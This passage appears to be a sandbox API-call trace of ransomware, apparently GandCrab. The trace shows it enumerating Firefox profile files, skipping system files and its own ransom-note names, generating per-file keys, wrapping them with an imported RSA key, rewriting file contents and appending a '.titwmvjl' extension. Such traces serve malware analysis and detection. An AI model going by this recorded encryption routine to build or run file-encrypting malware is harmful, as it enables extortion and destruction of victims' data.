(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0081.087] lstrlenW (lpString=".jsonlz4") returned 8 [0081.087] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.087] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0081.087] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.087] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.087] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0081.088] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.088] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.114] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.117] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.117] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.118] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.118] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0081.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.118] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.118] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.118] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.121] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.121] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.121] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.121] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0081.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.121] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.121] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.122] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.124] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0081.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.125] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.125] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.125] GetLastError () returned 0x0 [0081.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.125] CryptDestroyKey (hKey=0x5037b8) returned 1 [0081.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.125] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.126] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.129] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503538) returned 1 [0081.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.129] CryptGetKeyParam (in: hKey=0x503538, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.129] CryptEncrypt (in: hKey=0x503538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.129] GetLastError () returned 0x0 [0081.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.129] CryptDestroyKey (hKey=0x503538) returned 1 [0081.130] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.130] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.130] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.130] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.130] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x14b2, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffeb4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.203] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14b2, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x14b2, lpOverlapped=0x0) returned 1 [0081.220] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.220] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0081.222] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.226] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.226] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.226] CloseHandle (hObject=0x2ec) returned 1 [0081.227] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0081.228] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.228] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.228] lstrcmpW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2=".") returned 1 [0081.228] lstrcmpW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="..") returned 1 [0081.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" [0081.228] lstrlenW (lpString=".titwmvjl") returned 9 [0081.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0081.228] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.229] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.titwmvjl") returned 183 [0081.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0081.229] lstrlenW (lpString=".jsonlz4") returned 8 [0081.229] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.229] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0081.229] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0081.229] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0081.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="desktop.ini") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="autorun.inf") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="iconcache.db") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="boot.ini") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="thumbs.db") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="ntldr") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0081.229] lstrcmpiW (lpString1="1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0081.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4") returned 174 [0081.229] lstrlenW (lpString=".jsonlz4") returned 8 [0081.230] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.230] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0081.230] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.230] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.230] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0081.230] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.231] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0081.337] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.337] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.340] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.340] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.340] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.340] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0081.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.340] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.340] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.341] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.343] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.344] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.344] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.344] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0081.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.344] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.344] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.344] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.347] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503338) returned 1 [0081.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.347] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.348] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.348] GetLastError () returned 0x0 [0081.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.348] CryptDestroyKey (hKey=0x503338) returned 1 [0081.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.348] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.348] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.352] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5032f8) returned 1 [0081.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.352] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.353] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.353] GetLastError () returned 0x0 [0081.353] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.353] CryptDestroyKey (hKey=0x5032f8) returned 1 [0081.353] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.353] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.353] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.353] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.354] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x149b, lpOverlapped=0x0) returned 1 [0081.367] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffeb65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.367] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x149b, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x149b, lpOverlapped=0x0) returned 1 [0081.368] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.368] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0081.369] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.373] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.373] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.373] CloseHandle (hObject=0x2ec) returned 1 [0081.374] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0081.375] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.375] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.375] lstrcmpW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2=".") returned 1 [0081.375] lstrcmpW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="..") returned 1 [0081.376] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" [0081.376] lstrlenW (lpString=".titwmvjl") returned 9 [0081.376] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0081.376] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.376] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.titwmvjl") returned 183 [0081.376] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0081.376] lstrlenW (lpString=".jsonlz4") returned 8 [0081.376] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.376] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0081.376] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0081.376] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.376] lstrlenW 